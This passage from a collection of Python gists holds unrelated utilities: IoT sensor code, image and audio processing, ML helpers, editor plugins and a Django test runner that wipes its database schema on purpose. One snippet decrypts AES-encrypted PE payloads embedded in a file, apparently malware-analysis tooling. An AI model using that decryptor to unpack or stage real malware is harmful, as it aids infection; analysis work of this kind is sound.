ENV['API_KEY'],
ENV['API_SECRET'],
auth_creds['oauth_token'],
auth_creds['oauth_token_secret'],
)
force_unfollow_fans(twitter)
return 'done!'
if __name__ == '__main__':
app.run(debug=True, port=int(ENV['PORT']))
```
#### File: hard-gists/cf4b324f8955bc56ce0ff9399d9fdea6/snippet.py
```python
import ds18x20
import gc
from machine import Timer, Pin
import network
import onewire
from time import sleep_ms
from umqtt.simple import MQTTClient
import urandom
PIN_TEMP = 5
def send_temp(t):
c = MQTTClient('clientname', '<mqtt_server_ip>')
c.connect()
c.publish('/topic/temp1', str(t))
sleep_ms(500)
print('Sent!')
c.disconnect()
def read_temp():
ds = ds18x20.DS18X20(onewire.OneWire(Pin(PIN_TEMP)))
roms = ds.scan()
ds.convert_temp()
sleep_ms(100)
# assume there is only 1 probe
return ds.read_temp(roms[0])
def run():
# tim = Timer(-1)
# tim.init(period=2000, mode=Timer.PERIODIC, callback=send_temp)
wlan = network.WLAN(network.STA_IF)
while True:
try:
if wlan.isconnected():
t = read_temp()
send_temp(t)
sleep_ms(10000)
else:
sleep_ms(1000)
except:
pass
run()
```
#### File: hard-gists/cfc9f059459cfefd1f61134b48291436/snippet.py
```python
import cStringIO
from math import log
import PIL.Image
from ssim import compute_ssim
def get_ssim_at_quality(photo, quality):
"""Return the ssim for this JPEG image saved at the specified quality"""
ssim_photo = cStringIO.StringIO()
# optimize is omitted here as it doesn't affect
# quality but requires additional memory and cpu
photo.save(ssim_photo, format="JPEG", quality=quality, progressive=True)
ssim_photo.seek(0)
ssim_score = compute_ssim(photo, PIL.Image.open(ssim_photo))
return ssim_score
def _ssim_iteration_count(lo, hi):
"""Return the depth of the binary search tree for this range"""
if lo >= hi:
return 0
else:
return int(log(hi - lo, 2)) + 1
def jpeg_dynamic_quality(original_photo):
"""Return an integer representing the quality that this JPEG image should be
saved at to attain the quality threshold specified for this photo class.
Args:
original_photo - a prepared PIL JPEG image (only JPEG is supported)
"""
ssim_goal = 0.95
hi = 85
lo = 80
# working on a smaller size image doesn't give worse results but is faster
# changing this value requires updating the calculated thresholds
photo = original_photo.resize((400, 400))
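# Note: _should_use_dynamic_quality() is not defined in this gist; it is assumed
# to be an external feature-flag / eligibility check in the original codebase.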
if not _should_use_dynamic_quality():
default_ssim = get_ssim_at_quality(photo, hi)
return hi, default_ssim
# 95 is the highest useful value for JPEG. Higher values cause different behavior
# Used to establish the image's intrinsic ssim without encoder artifacts
normalized_ssim = get_ssim_at_quality(photo, 95)
selected_quality = selected_ssim = None
# loop bisection. ssim function increases monotonically so this will converge
for i in xrange(_ssim_iteration_count(lo, hi)):
curr_quality = (lo + hi) // 2
curr_ssim = get_ssim_at_quality(photo, curr_quality)
ssim_ratio = curr_ssim / normalized_ssim
if ssim_ratio >= ssim_goal:
# continue to check whether a lower quality level also exceeds the goal
selected_quality = curr_quality
selected_ssim = curr_ssim
hi = curr_quality
else:
lo = curr_quality
if selected_quality:
return selected_quality, selected_ssim
else:
default_ssim = get_ssim_at_quality(photo, hi)
return hi, default_ssim
```
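A hedged usage sketch for `jpeg_dynamic_quality`. It assumes the `ssim` module imported above is available and that `_should_use_dynamic_quality()` (not shown in the gist) is defined elsewhere; the file names are hypothetical.

```python
# Sketch only: choose a quality level for one JPEG and re-save it.
photo = PIL.Image.open('input.jpg')  # hypothetical input file
quality, ssim_score = jpeg_dynamic_quality(photo)
photo.save('output.jpg', format='JPEG', quality=quality,
           progressive=True, optimize=True)
print 'chose quality %d (ssim %.4f)' % (quality, ssim_score)
```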
#### File: hard-gists/d049a307a271052dc740/snippet.py
```python
import sys
import pefile
from StringIO import StringIO
from Crypto.Cipher import AES
K = ''.join(chr(x) for x in range(0x0f, 0x4f, 2))
ENC_HEADER="\x23\x59\x90\x70\xe9\xc1\xec\x82\xb4\x87\xb3\x4e\x03\x10\x6c\x2e"
decrypt = lambda d: AES.new(K,AES.MODE_ECB).decrypt(d)
chunks = lambda l, n: [l[x: x+n] for x in xrange(0, len(l), n)]
IDX = 0
def decrypt_payload(d,off):
global IDX
out = StringIO()
if decrypt(d[off:off+16]).startswith('MZ'):
print '[%d][+] found encrypted MZ @ %X'% (IDX,off)
try:
pe_hdr = decrypt(d[off:off+0x400])
pe = pefile.PE(data=pe_hdr)
except:
return None
print '[%d][+] OK its parsable, lets proceed' % IDX
for c in chunks(d[off:],16):
out.write(decrypt(c))
IDX +=1
return out
path = sys.argv[1]
#off = int(sys.argv[2],16)
#size = int(sys.argv[3],16)
#cnt = 0
with open(path) as f:
d=f.read()
off =d.find(ENC_HEADER)
while off != -1:
r= decrypt_payload(d,off)
if not r:
print '[-] this is not a PE i was looking for...'
sys.exit(1)
d = r.getvalue()
off =d.find(ENC_HEADER)
with open(path+'.dec','wb') as f:
f.write(d)
print '[*] decrypted payload saved as',path+'.dec'
```
#### File: hard-gists/d100a028027c5a6b8340/snippet.py
```python
from dateutil import rrule
import datetime
# Generate ruleset for holiday observances on the NYSE
def NYSE_holidays(a=datetime.date.today(), b=datetime.date.today()+datetime.timedelta(days=365)):
rs = rrule.rruleset()
# Include all potential holiday observances
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=12, bymonthday=31, byweekday=rrule.FR)) # New Years Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 1, bymonthday= 1)) # New Years Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 1, bymonthday= 2, byweekday=rrule.MO)) # New Years Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 1, byweekday= rrule.MO(3))) # Martin Luther King Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 2, byweekday= rrule.MO(3))) # Washington's Birthday
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, byeaster= -2)) # Good Friday
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 5, byweekday= rrule.MO(-1))) # Memorial Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 7, bymonthday= 3, byweekday=rrule.FR)) # Independence Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 7, bymonthday= 4)) # Independence Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 7, bymonthday= 5, byweekday=rrule.MO)) # Independence Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 9, byweekday= rrule.MO(1))) # Labor Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=11, byweekday= rrule.TH(4))) # Thanksgiving Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=12, bymonthday=24, byweekday=rrule.FR)) # Christmas
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=12, bymonthday=25)) # Christmas
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=12, bymonthday=26, byweekday=rrule.MO)) # Christmas
# Exclude potential holidays that fall on weekends
rs.exrule(rrule.rrule(rrule.WEEKLY, dtstart=a, until=b, byweekday=(rrule.SA,rrule.SU)))
return rs
# Generate ruleset for NYSE trading days
def NYSE_tradingdays(a=datetime.date.today(), b=datetime.date.today()+datetime.timedelta(days=365)):
rs = rrule.rruleset()
rs.rrule(rrule.rrule(rrule.DAILY, dtstart=a, until=b))
# Exclude weekends and holidays
rs.exrule(rrule.rrule(rrule.WEEKLY, dtstart=a, byweekday=(rrule.SA,rrule.SU)))
rs.exrule(NYSE_holidays(a,b))
return rs
# Examples
# List all NYSE holiday observances for the coming year
print "NYSE Holidays\n"
for dy in NYSE_holidays():
print dy.strftime('%b %d %Y')
# Count NYSE trading days in next 5 years
print "\n\nTrading Days\n"
for yr in range(2015,2020):
tdays = len(list(NYSE_tradingdays(datetime.datetime(yr,1,1),datetime.datetime(yr,12,31))))
print "{0} {1}".format(yr,tdays)
```
#### File: hard-gists/d29d079100f8d81b905e/snippet.py
```python
import logging
from sklearn.metrics import roc_auc_score
from keras.callbacks import Callback
class IntervalEvaluation(Callback):
def __init__(self, validation_data=(), interval=10):
super(IntervalEvaluation, self).__init__()
self.interval = interval
self.X_val, self.y_val = validation_data
def on_epoch_end(self, epoch, logs={}):
if epoch % self.interval == 0:
y_pred = self.model.predict_proba(self.X_val, verbose=0)
score = roc_auc_score(self.y_val, y_pred)
logging.info("interval evaluation - epoch: {:d} - score: {:.6f}".format(epoch, score))
# (snip)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)
X_train, y_train, X_test, y_test = load_data()
ival = IntervalEvaluation(validation_data=(X_test, y_test), interval=10)
clf = keras_model(input_size=X_train.shape[1])
clf.fit(X_train, y_train, nb_epoch=100, batch_size=128, verbose=0, callbacks=[ival])
```
#### File: hard-gists/d37ab1524a7d5e373ee5a2a0176ebd22/snippet.py
```python
import glob
import h5py
import matplotlib.animation as animation
import matplotlib.pyplot as plot
import numpy as np
import tensorflow as tf
def main():
datafiles = glob.glob('data/*.h5')
for datafile in datafiles:
with h5py.File(datafile) as data:
figure = plot.figure()
imageplot = plot.imshow(np.zeros((227, 227, 3), dtype=np.uint8))
def next_frame(i):
image = 255 - data['images'][i].transpose(1, 2, 0)[:, :, ::-1]
imageplot.set_array(image)
return imageplot,
animate = animation.FuncAnimation(figure, next_frame, frames=range(len(data['images'])), interval=252, blit=False)
plot.show()
if __name__ == '__main__':
main()
```
#### File: hard-gists/d52d9ba44541fabaf4b012f4e62d675b/snippet.py
```python
import os
from django.test.runner import DiscoverRunner
"""
WARNING: WHEN USED INCORRECTLY THIS TEST RUNNER WILL DROP ALL TABLES IN YOUR PRODUCTION
DATABASE!!!
Heroku does not give users createdb/dropdb permissions, therefore Heroku CI cannot run tests for django.
In order to fix this, use this test runner instead which attempts to minimally override the
default test runner by a) forcing keepdb=True to stop database create/drop, and b) by dropping all
tables after a test run and resetting the database to its initial blank state.
Usage:
1. In your django test settings file add the following two lines to ensure that the test
database name is the same as the Heroku provided database name.
DATABASES['default'] = env.db('DATABASE_URL') # or whatever you use to load the Heroku database settings
DATABASES['default']['TEST'] = {'NAME': DATABASES['default']['NAME']}
2. Set the testrunner to this file
TEST_RUNNER = 'your_modules.HerokuDiscoverRunner'
3. Set an environment variable on heroku CI of IS_HEROKU_TEST=1 to enable this runner, otherwise
the runner will exit as a safety measure.
"""
class HerokuDiscoverRunner(DiscoverRunner):
def setup_databases(self, **kwargs):
if not os.environ.get('IS_HEROKU_TEST'):
raise ValueError(
"The IS_HEROKU_TEST env variable must be set to enable this. WARNING: "
"This test runner will wipe all tables in the database it targets!")
self.keepdb = True
return super(HerokuDiscoverRunner, self).setup_databases(**kwargs)
def _wipe_tables(self, connection):
with connection.cursor() as cursor:
cursor.execute(
"""
DROP SCHEMA public CASCADE;
CREATE SCHEMA public;
GRANT ALL ON SCHEMA public TO postgres;
GRANT ALL ON SCHEMA public TO public;
COMMENT ON SCHEMA public IS 'standard public schema';
"""
)
def teardown_databases(self, old_config, **kwargs):
self.keepdb = True
for connection, old_name, destroy in old_config:
if destroy:
self._wipe_tables(connection)
super(HerokuDiscoverRunner, self).teardown_databases(old_config, **kwargs)
```
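A minimal settings sketch matching the docstring's three steps. The dotted path `myproject.testrunner` and the use of django-environ to load `DATABASE_URL` are assumptions, not part of the gist.

```python
# Test settings (sketch) -- wire up the runner defined above.
import environ

env = environ.Env()
DATABASES = {'default': env.db('DATABASE_URL')}
DATABASES['default']['TEST'] = {'NAME': DATABASES['default']['NAME']}
TEST_RUNNER = 'myproject.testrunner.HerokuDiscoverRunner'  # hypothetical module path
```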
#### File: hard-gists/d6eb474543c32eb33504/snippet.py
```python
import io
import urllib
import threading
from kivy.uix.image import Image
from kivy.app import App
from kivy.properties import StringProperty
from kivy.core.image import Image as CoreImage
from kivy.clock import Clock
from collections import deque
class MjpegViewer(Image):
url = StringProperty()
def start(self):
self.quit = False
self._queue = deque()
self._thread = threading.Thread(target=self.read_stream)
self._thread.daemon = True
self._thread.start()
self._image_lock = threading.Lock()
self._image_buffer = None
Clock.schedule_interval(self.update_image, 1 / 30.)
def stop(self):
self.quit = True
self._thread.join()
Clock.unschedule(self.update_image)
def read_stream(self):
stream = urllib.urlopen(self.url)
bytes = ''
while not self.quit:
bytes += stream.read(1024)
a = bytes.find('\xff\xd8')
b = bytes.find('\xff\xd9')
if a != -1 and b != -1:
jpg = bytes[a:b + 2]
bytes = bytes[b + 2:]
data = io.BytesIO(jpg)
im = CoreImage(data,
ext="jpeg",
nocache=True)
with self._image_lock:
self._image_buffer = im
def update_image(self, *args):
im = None
with self._image_lock:
im = self._image_buffer
self._image_buffer = None
if im is not None:
self.texture = im.texture
self.texture_size = im.texture.size
if __name__ == "__main__":
class MjpegViewerApp(App):
def build(self):
viewer = MjpegViewer(
url=
"http://192.168.3.11:3344/axis-cgi/mjpg/video.cgi?resolution=320x240")
viewer.start()
return viewer
MjpegViewerApp().run()
```
#### File: hard-gists/dc673da0c531c7a6059b/snippet.py
```python
import sublime
import sublime_plugin
# { "keys": ["alt+shift+p"], "command": "fuzzy_pretty" },
BRACKETS = {
'{': '}',
'(': ')',
'[': ']',
}
SEPS = [
';', ',', '\n',
]
OPERATERS = [
':', '=',
]
def build(tree, indent=''):
if indent is False:
out = ''
for node in tree:
if isinstance(node, str):
out += node
elif isinstance(node, list):
out += build(node, indent=False)
return out
out = ''
test = None
line = ''
for i, node in enumerate(tree):
if isinstance(node, str):
if node in BRACKETS.values():
out = out[:-len(line)]
line = line[:-1] + node + '\n'
elif node in SEPS:
out = out[:-len(line)]
line = line[:-1] + node + '\n'
else:
line = indent + node + '\n'
elif isinstance(node, list):
test = build(node, indent=False)
if len(line+test) < 80:
out = out[:-len(line)]
line = line[:-1] + test + '\n'
else:
line = build(node, indent=indent+' ')
out += line
return out
def proc(text):
buf = ''
root = []
context = root
stacks = []
brackets = []
for c in text:
if len(brackets) > 0 and c == brackets[-1]:
brackets.pop()
context.append(buf + c)
buf = ''
context = stacks.pop()
elif c in BRACKETS:
brackets.append(BRACKETS[c])
context.append(buf + c)
buf = ''
new_context = []
context.append(new_context)
stacks.append(context)
context = new_context
elif c in SEPS:
if c == '\n':
c = ''
if buf == '' and len(context) > 0:
context[-1] += c
elif buf == '' and c == '':
pass
else:
context.append(buf + c)
buf = ''
elif buf == '' and c in ' \t':
pass
else:
buf += c
context.append(buf)
return build(root)
class FuzzyPrettyCommand(sublime_plugin.TextCommand):
def run(self, edit, **kwargs):
view = self.view
sel = view.sel()[0]
region = sel
if sel.empty():
region = sublime.Region(0, view.size())
text = view.substr(region)
text = proc(text)
view.replace(edit, region, text)
```
#### File: hard-gists/dd1538665994b48972a62966b4369354/snippet.py
```python
import photos
import console
from objc_util import *
CIFilter, CIImage, CIContext, CIDetector, CIVector = map(ObjCClass, ['CIFilter', 'CIImage', 'CIContext', 'CIDetector', 'CIVector'])
def take_photo(filename='.temp.jpg'):
img = photos.capture_image()
if img:
img.save(filename)
return filename
def pick_photo(filename='.temp.jpg'):
img = photos.pick_image()
if img:
img.save(filename)
return filename
def load_ci_image(img_filename):
data = NSData.dataWithContentsOfFile_(img_filename)
if not data:
raise IOError('Could not read file')
ci_img = CIImage.imageWithData_(data)
return ci_img
def find_faces(ci_img):
opt = {'CIDetectorAccuracy': 'CIDetectorAccuracyHigh'}
d = CIDetector.detectorOfType_context_options_('CIDetectorTypeFace', None, opt)
faces = d.featuresInImage_(ci_img)
return faces
def apply_perspective(corners, ci_img):
tr, br, tl, bl = [CIVector.vectorWithX_Y_(c.x, c.y) for c in corners]
filter = CIFilter.filterWithName_('CIPerspectiveCorrection')
filter.setDefaults()
filter.setValue_forKey_(ci_img, 'inputImage')
filter.setValue_forKey_(tr, 'inputTopRight')
filter.setValue_forKey_(tl, 'inputTopLeft')
filter.setValue_forKey_(br, 'inputBottomRight')
filter.setValue_forKey_(bl, 'inputBottomLeft')
out_img = filter.valueForKey_('outputImage')
return out_img
def write_output(out_ci_img, filename='.output.jpg'):
ctx = CIContext.contextWithOptions_(None)
cg_img = ctx.createCGImage_fromRect_(out_ci_img, out_ci_img.extent())
ui_img = UIImage.imageWithCGImage_(cg_img)
c.CGImageRelease.argtypes = [c_void_p]
c.CGImageRelease.restype = None
c.CGImageRelease(cg_img)
c.UIImageJPEGRepresentation.argtypes = [c_void_p, CGFloat]
c.UIImageJPEGRepresentation.restype = c_void_p
data = ObjCInstance(c.UIImageJPEGRepresentation(ui_img.ptr, 0.75))
data.writeToFile_atomically_(filename, True)
return filename
def main():
console.clear()
i = console.alert('Info', 'This script detects faces in a photo.', 'Take Photo', 'Pick from Library')
if i == 1:
filename = take_photo()
else:
filename = pick_photo()
if not filename:
return
ci_img = load_ci_image(filename)
out_file = write_output(ci_img)
console.show_image(out_file)
faces = find_faces(ci_img)
if faces.count() == 0:
print('Error: Could not find a face in the photo. Please try again with a different image.')
return
j=0
for face in faces:
b = face.bounds()
w=b.size.width
h=b.size.height
rt=CGPoint(b.origin.x+w,b.origin.y+h)
rb=CGPoint(b.origin.x+w,b.origin.y)
lt=CGPoint(b.origin.x,b.origin.y+h)
lb=CGPoint(b.origin.x,b.origin.y)
corners = (rt,rb,lt,lb)
out_img = apply_perspective(corners, ci_img)
j=j+1
out_file = write_output(out_img,filename='.output'+str(j)+'.jpg')
console.show_image(out_file)
print('Tap and hold the image to save it to your camera roll.')
if __name__ == '__main__':
main()
```
#### File: hard-gists/df919538bcef391bc89f/snippet.py
```python
import numpy
import pyaudio
import re
import sys
WIDTH = 79
BOOST = 1.0
# Create a nice output gradient using ANSI escape sequences.
cols = [30, 34, 35, 91, 93, 97]
chars = [(' ', False), (':', False), ('%', False), ('#', False),
('#', True), ('%', True), (':', True)]
gradient = []
for bg, fg in zip(cols, cols[1:]):
for char, invert in chars:
if invert:
bg, fg = fg, bg
gradient.append('\x1b[{};{}m{}'.format(fg, bg + 10, char))
class Spectrogram(object):
def __init__(self):
self.audio = pyaudio.PyAudio()
def __enter__(self):
"""Open the microphone stream."""
device_index = self.find_input_device()
device_info = self.audio.get_device_info_by_index(device_index)
rate = int(device_info['defaultSampleRate'])
self.buffer_size = int(rate * 0.02)
self.stream = self.audio.open(format=pyaudio.paInt16,
channels=1, rate=rate, input=True,
input_device_index=device_index,
frames_per_buffer=self.buffer_size)
return self
def __exit__(self, *ignored):
"""Close the microphone stream."""
self.stream.close()
def find_input_device(self):
"""
Find a microphone input device. Return None if no preferred
device was found, and the default should be used.
"""
for i in range(self.audio.get_device_count()):
name = self.audio.get_device_info_by_index(i)['name']
if re.match('mic|input', name, re.I):
return i
return None
def color(self, x):
"""
Given 0 <= x <= 1 (input is clamped), return a string of ANSI
escape sequences representing a gradient color.
"""
x = max(0.0, min(1.0, x))
return gradient[int(x * (len(gradient) - 1))]
def listen(self):
"""Listen for one buffer of audio and print a gradient."""
block_string = self.stream.read(self.buffer_size)
block = numpy.fromstring(block_string, dtype='h') / 32768.0
nbands = 30 * WIDTH
fft = abs(numpy.fft.fft(block, n=nbands))
pos, neg = numpy.split(fft, 2)
bands = (pos + neg[::-1]) / float(nbands) * BOOST
line = (self.color(x) for x in bands[:WIDTH])
print ''.join(line) + '\x1b[0m'
sys.stdout.flush()
if __name__ == '__main__':
with Spectrogram() as s:
while True:
s.listen()
```
#### File: hard-gists/e196107b5e0afc834652bd3153030c42/snippet.py
```python
import os
import portpicker
import subprocess
import sys
import tensorflow as tf
import threading
import time
flags = tf.flags
flags.DEFINE_integer("iters", 10, "Maximum number of additions")
flags.DEFINE_integer("data_mb", 128, "size of vector in MBs")
flags.DEFINE_boolean("verbose", False, "whether to have verbose logging")
flags.DEFINE_boolean("profile", False, "whether to collect CPU profile")
# internal flags, set by client
flags.DEFINE_string("task_index", "", "# of current task")
flags.DEFINE_string("port0", "12222", "port of worker1, used as master")
flags.DEFINE_string("port1", "12223", "port of worker2")
FLAGS = flags.FLAGS
# setup local cluster from flags
def session_config():
optimizer_options = tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L0)
graph_options = tf.GraphOptions(optimizer_options=optimizer_options)
config = tf.ConfigProto(graph_options=graph_options,
intra_op_parallelism_threads=10,
inter_op_parallelism_threads=10)
return config
host = "127.0.0.1"
def clusterspec():
cluster = {"worker": [host+":"+FLAGS.port0, host+":"+FLAGS.port1]}
return tf.train.ClusterSpec(cluster).as_cluster_def()
def create_graph(device0, device1):
"""Create graph that keeps var1 on device0, var2 on device1 and adds them"""
tf.reset_default_graph()
dtype=tf.int32
params_size = 250*1000*FLAGS.data_mb # 1MB is 250k integers
with tf.device(device0):
var1 = tf.get_variable("var1", [params_size], dtype,
initializer=tf.ones_initializer())
with tf.device(device1):
var2 = tf.get_variable("var2", [params_size], dtype,
initializer=tf.ones_initializer())
add_op = var1.assign_add(var2)
init_op = tf.global_variables_initializer()
return init_op, add_op
def create_done_queue(i):
"""Queue used to signal death for i'th worker."""
with tf.device("/job:worker/task:%s" % (i)):
return tf.FIFOQueue(1, tf.int32, shared_name="done_queue"+
str(i))
def run_benchmark(sess, init_op, add_op):
"""Returns MB/s rate of addition."""
sess.run(init_op)
sess.run(add_op.op) # warm-up
start_time = time.time()
for i in range(FLAGS.iters):
sess.run(add_op.op)
elapsed_time = time.time() - start_time
return float(FLAGS.iters)*FLAGS.data_mb/elapsed_time
def run_benchmark_local():
ops = create_graph(None, None)
sess = tf.Session(config=session_config())
return run_benchmark(sess, *ops)
def run_benchmark_distributed():
ops = create_graph("/job:worker/task:0", "/job:worker/task:1")
queues = [create_done_queue(0), create_done_queue(1)]
# launch distributed service
port0, port1 = [portpicker.pick_unused_port() for _ in range(2)]
flags = " ".join(sys.argv) # pass parent flags to children
def run_worker(w):
my_env = os.environ.copy()
if not FLAGS.verbose:
my_env["CUDA_VISIBLE_DEVICES"] = ""
my_env["TF_CPP_MIN_LOG_LEVEL"] = "2"
if FLAGS.profile:
my_env["LD_PRELOAD"]="/usr/lib/libtcmalloc_and_profiler.so.4"
my_env["CPUPROFILE"]="/tmp/profile.out.%s"%(w)
cmd = "python %s --task=%d --port0=%s --port1=%s"%(flags, w, port0, port1)
subprocess.Popen(cmd, shell=True, stderr=subprocess.STDOUT,
env=my_env)
run_worker(0)
run_worker(1)
sess = tf.Session("grpc://%s:%s"%(host, port0), config=session_config())
rate = run_benchmark(sess, *ops)
# bring down workers
if FLAGS.verbose:
print("Killing workers.")
sess.run(queues[1].enqueue(1))
sess.run(queues[0].enqueue(1)) # bring down master last
return rate
if __name__=='__main__':
if not FLAGS.task_index:
rate1 = run_benchmark_local()
rate2 = run_benchmark_distributed()
if FLAGS.verbose:
print("Adding data in %d MB chunks" %(FLAGS.data_mb))
print("Local rate: %.2f MB/s" %(rate1,))
print("Distributed rate: %.2f MB/s" %(rate2,))
else: # Launch TensorFlow server
server = tf.train.Server(clusterspec(), config=session_config(),
job_name="worker",
task_index=int(FLAGS.task_index))
queue = create_done_queue(FLAGS.task_index)
sess = tf.Session(server.target, config=session_config())
sess.run(queue.dequeue())
time.sleep(1) # give chance for master session.run call to return
if FLAGS.verbose:
print("Worker %s quitting." %(FLAGS.task_index))
```
#### File: hard-gists/e223622e255bd5b8c9130407397a0494/snippet.py
```python
import os
import librosa
import matplotlib
import matplotlib.pyplot as plt
matplotlib.rcParams['svg.fonttype'] = 'none'
import numpy as np
from scipy.io.wavfile import read as readwav
# Constants
n_fft = 512
hop_length = 256
SR = 16000
over_sample = 4
res_factor = 0.8
octaves = 6
notes_per_octave=10
# Plotting functions
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'alpha': ((0.0, 1.0, 1.0),
(1.0, 0.0, 0.0))
}
my_mask = matplotlib.colors.LinearSegmentedColormap('MyMask', cdict)
plt.register_cmap(cmap=my_mask)
def note_specgram(path, ax, peak=70.0, use_cqt=True):
# Add several samples together
if isinstance(path, list):
for i, p in enumerate(path):
sr, a = readwav(p)
audio = a if i == 0 else a + audio
# Load one sample
else:
sr, audio = readwav(path)
audio = audio.astype(np.float32)
if use_cqt:
C = librosa.cqt(audio, sr=sr, hop_length=hop_length,
bins_per_octave=int(notes_per_octave*over_sample),
n_bins=int(octaves * notes_per_octave * over_sample),
real=False,
filter_scale=res_factor,
fmin=librosa.note_to_hz('C2'))
else:
C = librosa.stft(audio, n_fft=n_fft, win_length=n_fft, hop_length=hop_length, center=True)
mag, phase = librosa.core.magphase(C)
phase_angle = np.angle(phase)
phase_unwrapped = np.unwrap(phase_angle)
dphase = phase_unwrapped[:, 1:] - phase_unwrapped[:, :-1]
dphase = np.concatenate([phase_unwrapped[:, 0:1], dphase], axis=1) / np.pi
mag = (librosa.logamplitude(mag**2, amin=1e-13, top_db=peak, ref_power=np.max) / peak) + 1
ax.matshow(dphase[::-1, :], cmap=plt.cm.rainbow)
ax.matshow(mag[::-1, :], cmap=my_mask)
def plot_notes(list_of_paths, rows=2, cols=4, col_labels=[], row_labels=[],
use_cqt=True, peak=70.0):
"""Build a CQT rowsXcols.
"""
column = 0
N = len(list_of_paths)
assert N == rows*cols
fig, axes = plt.subplots(rows, cols, sharex=True, sharey=True)
fig.subplots_adjust(left=0.1, right=0.9, wspace=0.05, hspace=0.1)
# fig = plt.figure(figsize=(18, N * 1.25))
for i, path in enumerate(list_of_paths):
row = i / cols
col = i % cols
if rows == 1:
ax = axes[col]
elif cols == 1:
ax = axes[row]
else:
ax = axes[row, col]
print row, col, path, ax, peak, use_cqt
note_specgram(path, ax, peak, use_cqt)
ax.set_axis_bgcolor('white')
ax.set_xticks([]); ax.set_yticks([])
if col == 0 and row_labels:
ax.set_ylabel(row_labels[row])
if row == rows-1 and col_labels:
ax.set_xlabel(col_labels[col])
```
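A usage sketch for `plot_notes`; the WAV file names are hypothetical, and the number of paths must equal rows * cols.

```python
# Sketch: a 1x2 grid of CQT spectrograms from two hypothetical 16 kHz WAV files.
paths = ['note_a.wav', 'note_b.wav']
plot_notes(paths, rows=1, cols=2,
           col_labels=['note A', 'note B'], row_labels=['sample'])
plt.show()
```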
#### File: hard-gists/e2ef822c744357a4ed16ec0c885100a3/snippet.py
```python
from keras.models import Sequential
from keras.layers import Dense
from keras.utils.io_utils import HDF5Matrix
import numpy as np
def create_dataset():
import h5py
X = np.random.randn(200,10).astype('float32')
y = np.random.randint(0, 2, size=(200,1))
f = h5py.File('test.h5', 'w')
# Creating dataset to store features
X_dset = f.create_dataset('my_data', (200,10), dtype='f')
X_dset[:] = X
# Creating dataset to store labels
y_dset = f.create_dataset('my_labels', (200,1), dtype='i')
y_dset[:] = y
f.close()
create_dataset()
# Instantiating HDF5Matrix for the training set, which is a slice of the first 150 elements
X_train = HDF5Matrix('test.h5', 'my_data', start=0, end=150)
y_train = HDF5Matrix('test.h5', 'my_labels', start=0, end=150)
# Likewise for the test set
X_test = HDF5Matrix('test.h5', 'my_data', start=150, end=200)
y_test = HDF5Matrix('test.h5', 'my_labels', start=150, end=200)
# HDF5Matrix behave more or less like Numpy matrices with regards to indexing
print(y_train[10])
# But they do not support negative indices, so don't try print(X_train[-1])
model = Sequential()
model.add(Dense(64, input_shape=(10,), activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='sgd')
# Note: you have to use shuffle='batch' or False with HDF5Matrix
model.fit(X_train, y_train, batch_size=32, shuffle='batch')
model.evaluate(X_test, y_test, batch_size=32)
```
#### File: hard-gists/e3433ebba20c92b63111/snippet.py
```python
import ui
import os
from objc_util import ObjCInstance, ObjCClass
from operator import attrgetter
import time
import threading
import functools
import ftplib
import re
# http://stackoverflow.com/a/6547474
def human_size(size_bytes):
'''Helper function for formatting human-readable file sizes'''
if size_bytes == 1:
return "1 byte"
suffixes_table = [('bytes',0),('KB',0),('MB',1),('GB',2),('TB',2), ('PB',2)]
num = float(size_bytes)
for suffix, precision in suffixes_table:
if num < 1024.0:
break
num /= 1024.0
if precision == 0:
formatted_size = "%d" % num
else:
formatted_size = str(round(num, ndigits=precision))
return "%s %s" % (formatted_size, suffix)
class TreeNode (object):
def __init__(self):
self.expanded = False
self.children = None
self.leaf = True
self.title = ''
self.subtitle = ''
self.icon_name = None
self.level = 0
self.enabled = True
def expand_children(self):
self.expanded = True
self.children = []
def collapse_children(self):
self.expanded = False
def __repr__(self):
return '<TreeNode: "%s"%s>' % (self.title, ' (expanded)' if self.expanded else '')
class FileTreeNode (TreeNode):
def __init__(self, path, show_size=True, select_dirs=True,
file_pattern=None):
TreeNode.__init__(self)
self.path = path
self.title = os.path.split(path)[1]
self.select_dirs = select_dirs
self.file_pattern = file_pattern
is_dir = os.path.isdir(path)
self.leaf = not is_dir
ext = os.path.splitext(path)[1].lower()
if is_dir:
self.icon_name = 'Folder'
elif ext == '.py':
self.icon_name = 'FilePY'
elif ext == '.pyui':
self.icon_name = 'FileUI'
elif ext in ('.png', '.jpg', '.jpeg', '.gif'):
self.icon_name = 'FileImage'
else:
self.icon_name = 'FileOther'
self.show_size = show_size
if not is_dir and show_size:
self.subtitle = human_size((os.stat(self.path).st_size))
if is_dir and not select_dirs:
self.enabled = False
elif not is_dir:
filename = os.path.split(path)[1]
self.enabled = not file_pattern or re.match(file_pattern, filename)
@property
def cmp_title(self):
return self.title.lower()
def expand_children(self):
if self.children is not None:
self.expanded = True
return
files = os.listdir(self.path)
children = []
for filename in files:
if filename.startswith('.'):
continue
full_path = os.path.join(self.path, filename)
